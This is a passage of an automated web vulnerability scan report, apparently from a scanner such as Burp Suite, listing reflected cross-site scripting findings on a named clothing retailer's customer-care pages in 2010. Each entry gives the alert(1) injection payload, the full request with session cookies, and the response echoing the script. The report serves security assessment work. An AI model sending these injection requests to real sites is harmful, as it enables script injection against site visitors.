Date: Tue, 09 Nov 2010 16:16:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=34gef0dea5ctpbtgku4qtilqc2; expires=Tue, 09-Nov-2010 17:16:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare41986"-alert(1)-"bad21956557/");
//]]>
...[SNIP]...

1.39. http://www.fredperry.com/customercare/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 900a1"-alert(1)-"6e32b2c374e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/?900a1"-alert(1)-"6e32b2c374e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=75qs3uusvp70t54vc3kcgds952; expires=Tue, 09-Nov-2010 17:16:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/?900a1"-alert(1)-"6e32b2c374e=1");
//]]>
...[SNIP]...

1.40. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a54"-alert(1)-"6789d05419e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare75a54"-alert(1)-"6789d05419e/delivery/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=34tn4624mcd4thnbsvokvo7nf0; expires=Tue, 09-Nov-2010 17:17:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare75a54"-alert(1)-"6789d05419e/delivery/");
//]]>
...[SNIP]...

1.41. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eacb"-alert(1)-"257fda257ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/delivery3eacb"-alert(1)-"257fda257ac/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=41nrhbjdpjk7dkmn0nohfukmf3; expires=Tue, 09-Nov-2010 17:17:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/delivery3eacb"-alert(1)-"257fda257ac/");
//]]>
...[SNIP]...

1.42. http://www.fredperry.com/customercare/delivery/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd5f1"-alert(1)-"ada1d66d6a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/delivery/?dd5f1"-alert(1)-"ada1d66d6a4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j247u2arg3uide75hgajfi3le2; expires=Tue, 09-Nov-2010 17:16:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Deliver
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/delivery/?dd5f1"-alert(1)-"ada1d66d6a4=1");
//]]>
...[SNIP]...

1.43. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c11fc"-alert(1)-"e04e37a7eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercarec11fc"-alert(1)-"e04e37a7eb/deliverylate/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l4erk5aec401u2f60cqm0060o6; expires=Tue, 09-Nov-2010 17:17:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercarec11fc"-alert(1)-"e04e37a7eb/deliverylate/");
//]]>
...[SNIP]...

1.44. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3ddd"-alert(1)-"ca7404da0f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/deliverylatee3ddd"-alert(1)-"ca7404da0f0/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m3t49fuevbtdncf9jjst5c8de7; expires=Tue, 09-Nov-2010 17:17:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/deliverylatee3ddd"-alert(1)-"ca7404da0f0/");
//]]>
...[SNIP]...

1.45. http://www.fredperry.com/customercare/deliverylate/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c50"-alert(1)-"6baf5d54777 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/deliverylate/?95c50"-alert(1)-"6baf5d54777=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sfs2d8bi9ii4tkdsp5it7l2l11; expires=Tue, 09-Nov-2010 17:16:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Late De
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/deliverylate/?95c50"-alert(1)-"6baf5d54777=1");
//]]>
...[SNIP]...

1.46. http://www.fredperry.com/customercare/faq/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae5a"-alert(1)-"40f1ed9aa59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercaredae5a"-alert(1)-"40f1ed9aa59/faq/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jdmst23utqklf1vmkl2k49ph12; expires=Tue, 09-Nov-2010 17:21:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercaredae5a"-alert(1)-"40f1ed9aa59/faq/");
//]]>
...[SNIP]...

1.47. http://www.fredperry.com/customercare/faq/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e6e4"-alert(1)-"7c11dc98e25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/faq5e6e4"-alert(1)-"7c11dc98e25/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9l0k5hcfbprm6okg0o12cfko46; expires=Tue, 09-Nov-2010 17:21:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/faq5e6e4"-alert(1)-"7c11dc98e25/");
//]]>
...[SNIP]...

1.48. http://www.fredperry.com/customercare/faq/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9f6"-alert(1)-"ff55126c3f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/faq/?8c9f6"-alert(1)-"ff55126c3f8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l69or4lakblg95828idk00ijs0; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Frequen
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/faq/?8c9f6"-alert(1)-"ff55126c3f8=1");
//]]>
...[SNIP]...

1.49. http://www.fredperry.com/customercare/information/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1d2"-alert(1)-"42fbc0107c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare7c1d2"-alert(1)-"42fbc0107c9/information/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kiqa43s52v9mfokqjcgequat17; expires=Tue, 09-Nov-2010 17:18:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare7c1d2"-alert(1)-"42fbc0107c9/information/");
//]]>
...[SNIP]...

1.50. http://www.fredperry.com/customercare/information/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 477f5"-alert(1)-"ef99901e51e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/information477f5"-alert(1)-"ef99901e51e/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r1u2itv5omnem2c1mrj2n6ief5; expires=Tue, 09-Nov-2010 17:18:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/information477f5"-alert(1)-"ef99901e51e/");
//]]>
...[SNIP]...

1.51. http://www.fredperry.com/customercare/information/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24020"-alert(1)-"c2e99d599f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/information/?24020"-alert(1)-"c2e99d599f1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e2t4iqbtg99k0fjj3tlm51ga61; expires=Tue, 09-Nov-2010 17:17:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Customs
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/information/?24020"-alert(1)-"c2e99d599f1=1");
//]]>
...[SNIP]...

1.52. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba55f"-alert(1)-"94d3f8d094a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

